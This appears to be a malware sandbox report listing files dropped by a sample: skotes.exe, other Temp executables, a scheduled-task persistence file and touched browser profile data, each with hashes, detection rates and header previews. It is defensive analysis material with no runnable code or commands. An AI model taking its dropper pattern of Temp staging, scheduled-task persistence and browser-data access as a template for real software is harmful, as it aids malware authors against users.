SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	919552
Entropy (8bit):	6.584687747616377
Encrypted:	false
SSDEEP:	12288:BqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDga/TR:BqDEvCTbMWu7rQYlBQcBiT6rprG8abR
MD5:	9BDCA68B008C8506E9070AA48676D172
SHA1:	68852A9063ED26D8A19E22D68042585DF7B0858B
SHA-256:	A1FEF53B423845E83B565D6F2990D458DBCEEEAB88C083E1078C01EF469335A2
SHA-512:	3D7135F3A3A7CE6C31EDDC0B2C89CA9FC2734E7855E8728D8602AC63EF6BFBCDC0489984E940551215EEB6537A04B434ED23C26BC09AFCAB6D1DB614C4B4F835
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@............................n......~............{.......{......{.......z....{......Rich...................PE..L...;Mg.........."..........X......w.............@..........................`......a.....@...@.......@.....................d...\|....@..(........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.362285518204318
Encrypted:	false
SSDEEP:	48:SfNaoQkwNTEQkzfNaoQUQOYfNaoQVQdfNaoQIKB0UrU0U8QIZ:6NnQkwNTEQkrNnQUQnNnQVQJNnQIKB06
MD5:	398B0268656530A02E36F13BBA6B634D
SHA1:	AE006627DC3B64BDD46D1766156C9266694CC17D
SHA-256:	D5840C1780D3CA180A906043F4270C29E53C699F37C4886E66E5F99D3B21ED11
SHA-512:	4A83B0B85A0F5D7EC6E3948D73B0AC141B799D3E4F45FD3F83AE84D2CA41D2AE90EAACF5CB3EB6DC923F9F74F59EEDCEA22911E8B6F88E792826C7B41F5F4494
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/05977037826C21498B8257E42FB2D003",.. "id": "05977037826C21498B8257E42FB2D003",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/05977037826C21498B8257E42FB2D003"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/39E7851D72596D32171D277FDCCC0B48",.. "id": "39E7851D72596D32171D277FDCCC0B48",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/39E7851D72596D32171D277FDCCC0B48"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3147776
Entropy (8bit):	6.639023596249995
Encrypted:	false
SSDEEP:	98304:cY+y7NIXr/VR9lk9mMM3S68QZVIcawid6khAyi:ymWVxo8Xy
MD5:	BD02FBC4F962284AA8C9B6F50781EA8A
SHA1:	105ABAA0A053BF102DFBC24DD2D93EF7173D46DD
SHA-256:	2E82CDC1CE6A5B075CF2F50C00B4FDB458DAA0351502EF654C3D6BF868B51504
SHA-512:	CA060EB94EF596BC235F3C9BD9E1BFD412A6CDCC8C9F3ED69A2359E9D5059EF7CDB19DF11337E791E0A04059B95F5B1F6DC2C133CB521CB30E7E8E9112DC25EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@..........................@0.......0...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...uxuaewjg.P......L.................@...tafnuvmn......0......./.............@....taggant.0....0.."..../.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	13504000
Entropy (8bit):	6.383363396613263
Encrypted:	false
SSDEEP:	98304:n13Yvg6wqZeAyv4LdzsBatXP/5OT8BJ5aXdyOJ33iV0SKvVirjedq:130gPNBaRP/D4NyOJ33A7Kt2Q
MD5:	704D12A2E64A9B3EBE375594A11F3EE6
SHA1:	E6E45CD1926DE46BFA0832DE19DDEB29C8C0F629
SHA-256:	B5975C9EB7E34161AE63EAB8518B130D4FDCC1526CA512D2E5452C6D701FE912
SHA-512:	B72689628014A48976672427D0470D8E024DAC4D3B266BC9398A8DADD72F1B4D4DC1A4429847A45956AE604CF072CF5419CF3036A4E6D5373517DB38A9D3FFB4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........`...............ba..................`....@..........................p............@.............................................P........................................................................... o...............................text...E`a......ba................. ..`.rdata....^...a...^..fa.............@..@.data........`...X...D..............@....idata..............................@....reloc..............................@..B.symtab..............`.................B.rsrc...P............b..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3147776
Entropy (8bit):	6.639023596249995
Encrypted:	false
SSDEEP:	98304:cY+y7NIXr/VR9lk9mMM3S68QZVIcawid6khAyi:ymWVxo8Xy
MD5:	BD02FBC4F962284AA8C9B6F50781EA8A
SHA1:	105ABAA0A053BF102DFBC24DD2D93EF7173D46DD
SHA-256:	2E82CDC1CE6A5B075CF2F50C00B4FDB458DAA0351502EF654C3D6BF868B51504
SHA-512:	CA060EB94EF596BC235F3C9BD9E1BFD412A6CDCC8C9F3ED69A2359E9D5059EF7CDB19DF11337E791E0A04059B95F5B1F6DC2C133CB521CB30E7E8E9112DC25EF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@..........................@0.......0...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...uxuaewjg.P......L.................@...tafnuvmn......0......./.............@....taggant.0....0.."..../.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2095616
Entropy (8bit):	7.956949866153719
Encrypted:	false
SSDEEP:	49152:DTwsevJGmtkr7AjOENmCOsPo08CUG+UbREOj4CXD3g7:DTSJGmLj9NMcz8CrNRbj4Cz3g7
MD5:	0625BFB508155BF72C447F0819C545A5
SHA1:	FB030ECED8EB89CB25DBB78712CF38476BB959A0
SHA-256:	42321395D0E8E8706391651A061C178878218698EBC6C1A6E2AAAA0D38C23B2B
SHA-512:	B19347B046267D036C735BB4C60D66611CAAB634C878F8D6B104738DCD617D22DE377F87CD35A1B2A25BE42E30A8BA25CBEE4B6293D5D048A0291815C7BA7C05
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,......Pq...........@...........................q....... ...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... .P).........................@...kwdkpzgx.P....W..J..................@...juauvnci.....@q.....................@....taggant.0...Pq.."..................@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	919552
Entropy (8bit):	6.584687747616377
Encrypted:	false
SSDEEP:	12288:BqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDga/TR:BqDEvCTbMWu7rQYlBQcBiT6rprG8abR
MD5:	9BDCA68B008C8506E9070AA48676D172
SHA1:	68852A9063ED26D8A19E22D68042585DF7B0858B
SHA-256:	A1FEF53B423845E83B565D6F2990D458DBCEEEAB88C083E1078C01EF469335A2
SHA-512:	3D7135F3A3A7CE6C31EDDC0B2C89CA9FC2734E7855E8728D8602AC63EF6BFBCDC0489984E940551215EEB6537A04B434ED23C26BC09AFCAB6D1DB614C4B4F835
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@............................n......~............{.......{......{.......z....{......Rich...................PE..L...;Mg.........."..........X......w.............@..........................`......a.....@...@.......@.....................d...\|....@..(........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2778112
Entropy (8bit):	6.520236083146977
Encrypted:	false
SSDEEP:	49152:xIiFD6xkjl9IJIooXnq/upXE/8TwH+eq:xIAD6Gx9IJiqGR
MD5:	6D60EE79CBE29830A8F4C2F7541D3E6C
SHA1:	47E98D4E24A51A9FF43B306B34B2F943FF2A4C25
SHA-256:	A9CC4F8BC22BF66ECB50DABE3CFA108728C53B8DDA35878ECB98D547454C180A
SHA-512:	3CE4021601EE733110AE1B8C3970EC2355C4B99F004E506C79980A26FFB0D4B20DD10266C306E1033DEEC5278E8A11F7F38651A98529CD85A24A0919E449341C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ....................... +..........`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...lnurvrsx. .........:..............@...bknhvqdr. ..........>.............@....taggant.@......"...B.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3235328
Entropy (8bit):	6.666939659001904
Encrypted:	false
SSDEEP:	49152:tRCiNmW7ggey/6JYzvfqTkGkJHi9Eu+0yp++IhT/W/oa/EiS:6sj9eM6JYzvfYkGkJC2u+08++IaDEi
MD5:	80780678447355A2BC3157723D80033B
SHA1:	3CA0030F2582C21959F2B5D25CF57A926A4314A1
SHA-256:	DEF526B2C332D0019092A86B5686C4ED246779CD8E3235AEF94C4901DFC7D361
SHA-512:	90FADE4EC430FFD1F165D6CBEF9AE8D4D9F93F17200C0907F85E5C653484D72E0C7471A32BD42544DFF4350E96A4C16521C87E5779B8B068F9F8C85A662EE546
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................p1...........@...........................1.......1...@.................................W...k............................P1..............................O1..................................................... . ............................@....rsrc...............................@....idata ............................@...dwzjxvhv..........................@...mmbykldk.....`1......61.............@....taggant.0...p1.."...<1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9881
Entropy (8bit):	5.531883823463598
Encrypted:	false
SSDEEP:	192:qnaRtZYbBp65hj4qyaaX86KakfGNBw8dJSl:de7quOcwm0
MD5:	60CD002137AD36C5EAB9FBDF078BE517
SHA1:	4452AFEA554D814002AC42AB21F8F5507ADCB655
SHA-256:	88340E332CA24076828F42E7472B9A447D97AFC4C51C3D9E2BD45D02091F5832
SHA-512:	93088DB5F42AEC56F24DF53F9E90F913E3845B79BB829719EBDBFF1CE0D13C93E68BB559F5D6EEFBC70805CB91181FB516233396D633D5D857FAD3BE7CA548C1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9881
Entropy (8bit):	5.531883823463598
Encrypted:	false
SSDEEP:	192:qnaRtZYbBp65hj4qyaaX86KakfGNBw8dJSl:de7quOcwm0
MD5:	60CD002137AD36C5EAB9FBDF078BE517
SHA1:	4452AFEA554D814002AC42AB21F8F5507ADCB655
SHA-256:	88340E332CA24076828F42E7472B9A447D97AFC4C51C3D9E2BD45D02091F5832
SHA-512:	93088DB5F42AEC56F24DF53F9E90F913E3845B79BB829719EBDBFF1CE0D13C93E68BB559F5D6EEFBC70805CB91181FB516233396D633D5D857FAD3BE7CA548C1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\DocumentsDHDHJJJECF.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	7.08810268095283
Encrypted:	false
SSDEEP:	768:p/YX8BsxC/t8vC4ChMpYtVuWNfaOgFsZuH2k7JEYmIZ8TEgJHyN08mhLBpPHhQKA:prR8VJma+EgJSN7+LBMKqv
MD5:	25598B50055676F87A35CB925232E300
SHA1:	98814A20127F872B1C31DBEB4B3C58DA7DDAE53B
SHA-256:	72E75365812AD4148337A7B207A3B6B93DE6A0292E5D8983D92790332236F932
SHA-512:	EDF042E516247B4D9B541CC8D267A4ACF1C75A4C88B44ECFEC5528767E6132880BFF4D3FC6D5713D0DD28C24882B9059EA88B7C139D8DFC8F8437F3834A26DE5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................p1...........@...........................1.......1...@.................................W...k............................P1..............................O1..................................................... . ............................@....rsrc...............................@....idata ............................@...dwzjxvhv..........................@...mmbykldk.....`1......61.............@....taggant.0...p1.."...<1.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.406574890121107
Encrypted:	false
SSDEEP:	6:qNvlnVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBYut0:mlnRf2RKQ1CGAFAjzvYRQVBBt0
MD5:	3E51739B0C1F70A0A3F396012DB2CF55
SHA1:	7F494278759BAFCC3E53F3533E5750AB8B81244F
SHA-256:	2386381CB43D8ADB1ACBD27B771AB24AEDBB3FA9BB5EEA2F485E360E0AA8EDEA
SHA-512:	300F22BA65D79F798707D87A51D3EA266D553E6D57458F2613322865AAFE89D71FBFB3F4DC39067B00E91918CEAA86EC79535CA81A59244D52A94C8A4D9A4064
Malicious:	false
Preview:	....`.....CL...?c1(}F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................-.@3P.........................

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (763)
Category:	downloaded
Size (bytes):	768
Entropy (8bit):	5.117875252183512
Encrypted:	false
SSDEEP:	12:uCRpAf4ybBZCnWd3BomBHslriFTAYsSw7sZAnIIIIIII5wuCPXIwuGHHHHHHHYZm:FpAD/CnKzBHslgT9lCuABuoB7HHHHHHp
MD5:	3038E473B5517928427A6B51BF87E12D
SHA1:	1F3690E1F203975EC53BECE33F1871D414623921
SHA-256:	A2DC7F5CBBA29D815D7D10FBCD33CBA2C6E8D37DDBDC70D5C4240C471BD2A667
SHA-512:	593274645FEEC1D98E008DC3D7A34419DEE70931C50D4CA1D57852BBDC66B96EBF0BD4DD8FC84FE9F18AD08FE8EE169F96477ED9C846123A131DC1F4F5DF56D3
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["baltasar ebang engonga reddit","rich shertenlieb show","chappell roan snl pink pony club","veterans day meals","cod black ops season 1","arkansas tornadoes","yankees gerrit cole contract","powerball jackpot"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133519
Entropy (8bit):	5.43540845289927
Encrypted:	false
SSDEEP:	3072:2Pivjxd0QniyZ+qQf4VBNQ0pqEvx7U+OUaKszQ:Eivv0yTVBNQ0pxvxI+ORQ
MD5:	33B1BA83E734E1203B632576D06B9DEE
